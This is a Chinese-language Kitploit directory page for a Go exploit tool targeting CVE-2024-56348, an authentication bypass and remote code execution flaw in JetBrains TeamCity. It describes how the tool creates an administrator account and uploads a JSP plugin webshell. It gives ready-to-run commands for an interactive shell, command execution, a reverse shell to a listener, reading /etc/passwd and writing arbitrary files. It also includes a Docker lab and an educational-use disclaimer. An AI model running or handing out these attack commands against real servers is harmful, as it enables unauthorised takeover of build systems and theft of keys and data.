Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2024-56348 — 基于 Go 的漏洞利用工具,针对 CVE-2024-56348,利用 JetBrains TeamCity 的身份验证绕过和远程代码执行漏洞。无需凭据即可提供交互式 Shell、反向 Shell、文件读写及单条命令执行功能。 | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2024-56348
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试身份验证红队远程访问工具
GitHubjoshuavanderpoll/cve-2024-56348

cve-2024-56348

基于 Go 的漏洞利用工具,针对 CVE-2024-56348,利用 JetBrains TeamCity 的身份验证绕过和远程代码执行漏洞。无需凭据即可提供交互式 Shell、反向 Shell、文件读写及单条命令执行功能。

查看仓库
236个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

JetBrains TeamCity 认证绕过 + RCE (CVE-2024-56348) PoC

Go

📜 描述

CVE-2024-56348 是一个严重的认证绕过漏洞,影响 JetBrains TeamCity 本地部署 所有早于 2024.12 的版本。REST API 错误地处理包含 ;.jsp 的路径请求,允许未经认证的攻击者像完全认证用户一样调用任意 REST 端点。

此漏洞利用将绕过与 TeamCity 自身的 REST API 结合,创建一个 SYSTEM_ADMIN 账户,生成 API 令牌,并实现 完全远程代码执行 — 通过内置调试端点或动态上传的 JSP 插件 webshell。无需任何凭据。

受影响版本: JetBrains TeamCity 本地部署 < 2024.12

✨ 功能

  • 交互式 Shell — 伪 shell,支持 stdout/stderr 分离,提示符中显示退出码
  • 命令执行 — 通过 -command 执行单条命令,输出完整的 stdout、stderr 和退出码
  • 反向 Shell — 部署 JSP 插件 webshell 并触发回调到你的监听器
  • 文件读取 — 读取 TeamCity 进程可访问的任何文件
  • 文件写入 — 向服务器上任何可写路径写入任意内容
  • 🛠️ 安装

    root@kitploit:~
    git clone https://github.com/joshuavanderpoll/cve-2024-56348.git
    cd CVE-2024-56348
    go build -o exp cve-2024-56348.go
    

    直接用 Go 安装

    root@kitploit:~
    go install github.com/joshuavanderpoll/cve-2024-56348@latest
    

    免安装运行

    root@kitploit:~
    go run github.com/joshuavanderpoll/cve-2024-56348@latest -t http://127.0.0.1:8111
    

    ⚙️ 用法

    root@kitploit:~
      -t          目标 URL  (例如 http://127.0.0.1:8111)
      -command    执行一条命令并打印输出
      -shell      生成反向 shell (需要 -lhost 和 -lport)
      -lhost      反向 shell 的监听主机
      -lport      反向 shell 的监听端口
      -read-file  读取远程文件并打印其内容
      -write-file 要写入的远程路径 (需要 -file-content)
      -file-content 使用 -write-file 时写入的内容
    

    不指定操作标志时会自动进入 交互式 shell。


    漏洞检查 + 交互式 shell

    连接到目标,确认绕过,创建临时管理员账户,并进入交互式 shell。提示符中的退出码为绿色(成功)或红色(非零)显示。

    root@kitploit:~
    ./cve-2024-56348 -t http://127.0.0.1:8111
    

    Interactive shell


    单条命令执行

    运行一条命令并分别打印 stdout、stderr 和退出码。

    root@kitploit:~
    ./cve-2024-56348 -t http://127.0.0.1:8111 -command "id"
    

    Command execution


    反向 Shell

    部署 JSP 插件 webshell 并触发反向 shell 回到你的监听器。先启动 nc -lvp 4444。

    root@kitploit:~
    ./cve-2024-56348 -t http://127.0.0.1:8111 -shell -lhost 10.0.0.1 -lport 4444
    

    Reverse shell


    文件读取

    读取 TeamCity 进程有权访问的任何文件 — 对配置文件、SSH 密钥等很有用。

    root@kitploit:~
    ./cve-2024-56348 -t http://127.0.0.1:8111 -read-file /etc/passwd
    

    Read file


    文件写入

    向远程路径写入任意内容。可用于投放额外载荷或修改配置。

    root@kitploit:~
    ./cve-2024-56348 -t http://127.0.0.1:8111 -write-file /tmp/readme.txt -file-content "LEAVE ME HERE"
    

    Write file


    🐋 Docker PoC

    一个自包含的 Docker Compose 环境,内含一个易受攻击的 TeamCity 实例,用于本地测试。 详情请查看 DOCKER.md

    root@kitploit:~
    cd docker/
    docker compose up -d
    ./cve-2024-56348 -t http://127.0.0.1:8111
    

    如果脚本返回 "[-] Plugin upload failed.",请尝试用 hackindex 用户登录然后再试。(凭据可在 DOCKER.md 中找到)

    🕵🏼 参考

    • JetBrains 安全公告 — CVE-2024-56348
    • NVD — CVE-2024-56348
    • HackIndex

    📢 免责声明

    此工具仅供教育和研究目的使用。作者对因使用本工具造成的任何误用或损害不承担任何责任。

    下载工具